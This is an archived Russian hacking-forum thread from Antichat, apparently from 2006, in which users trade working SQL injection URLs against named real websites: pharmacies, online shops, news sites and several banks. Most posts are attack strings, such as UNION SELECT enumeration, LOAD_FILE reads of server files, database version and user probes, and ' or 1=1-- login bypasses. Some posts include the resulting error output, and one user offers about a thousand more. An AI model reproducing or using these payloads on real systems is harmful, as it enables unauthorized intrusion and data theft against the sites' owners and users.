Форум АНТИЧАТ - SQL Инъекции

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - SQL Инъекции (https://forum.antichat.xyz/showthread.php?t=21336)

Нам cfm не преграда :)
canpharm.com

Цитата:

https://www.canpharm.com/index.cfm/fuseaction/cart.add?cart_productsize_fk=1+or+1=(SELECT+TOP+10 +TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+T ABLE_NAME+NOT+IN+(Provincestate))--

Zloy.org
http://zloy.org/news_n93'4.html
Уже месяц не могу закрыть...

BlueShop.ru

Цитата:

http://blueshop.ru/details.php?product_id=-796+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 ,0,0,0,0,0,0/*

forum.vbios.com

Цитата:

http://forum.vbios.com/addons/kit/serverinfo.php?id=-1%20UNION%20SELECT%200,0,0,0,0,0,0,0,0,0,0,0,0/*

И моя Гордость :)

Цитата:

http://www.secureusmeds.com/prices~category~0+union+select+convert(%22null%22% 20using%20utf8),LOAD_FILE('C:/boot.ini')+from+users.asp

Инет Магаз

Цитата:

http://apeks-msk.ru/category.php?id=-1+union+select+1,user(),3,4,5,6,7,8/*

Еще

Цитата:

http://antinomical.com/article/index.php?id_page=1+union+select+1,char(72,97,99,1 07,101,100,32,98,121,32,91,32,99,97,115,104,32,93) ,3,4,5,6,7/*

Цитата:

Сообщение от corsp_puttrider

http://abris.info/price/mark1.asp?id=-1

http://abris.info/price/mark1.asp?id=1 or 1=@@version--
http://abris.info/price/mark1.asp?id=1 or 1=(select db_name())--

табличка login там :)

Цитата:

Сообщение от [ cash ]

forum.vbios.com

ты уже 3 раз постиш это.

23.10.2006, 01:48

Цитата:

Сообщение от _-[A.M.D]HiM@S-_

PHP код:


		
			
http://forum.vbios.com/addons/kit/serverinfo.php?id=1%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,1320/*

_http://edu.ru/index.php?page_id=10&action=viewcat&cat=7' - далее жмем на любой форум и видим

Цитата:

query failed: insert into nuke_referer values (NULL, '_http://edu.ru/index.php?page_id=10&action=viewcat&cat=7''):You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ''_http://edu.ru/index.php?page_id=10&action=viewcat&cat=7'')' at

_http://www.srochno.mk.ru/article.asp?id=8324'

Пройдемся по банкам %)

_http://www.rs.ru/ru/index.php?id70=320'

_http://www.nationalbank.kz/?uid=9E21A7F6-802C-E8FB-3A9822E750174087&docid=178'

_http://www.trust.ru/common/promo_redirect.php?cid='13&lid=1&v=0&ul=L3J1L2luZG l2aWR1YWwvc2F2aW5ncy8=

_http://www.nbt.tj/?c=44&id=4'4&a=263'

_http://www.russlavbank.com/content.phtml?prcenter.newsdetail.276'

_http://www.sdm-bank.ru/news/20044'

_http://www.mtbank.ru/index.php?action='

_http://www.roscredit.ru/main/newsroom/news/38'

_http://www.forexpf.ru/forum/ - уязвим ( 2.1.6 rst exploit )

_http://www.paritate.ru/othernews/610301600'

Ребят а есть ли смысл выкладывать тут иньекции без перебора полей... я есть ли выложить около тысячи.

Подставляя одинарную кавычку далеко не уйдешь имхо.

shop.liprom.ru
apace+win+mssql :) жесть...

http://shop.liprom.ru/index.php
post
login ' or 1=1--
pass ' or 1=1--

далле
http://shop.liprom.ru/index.php?page=partner&keyval=18381&namekey=17945' +or+1=@@version--

http://shop.liprom.ru/index.php?page=partner&keyval=18381&namekey=17945' +or+1=(select+system_user)--

http://shop.liprom.ru/index.php?page=partner&keyval=18381&namekey=17945' +or+1=(select%20db_name())--

Далее

http://shop.liprom.ru/test/
post
login ' or 1=1--
pass ' or 1=1--

Ну и инклуд думаю все заметят...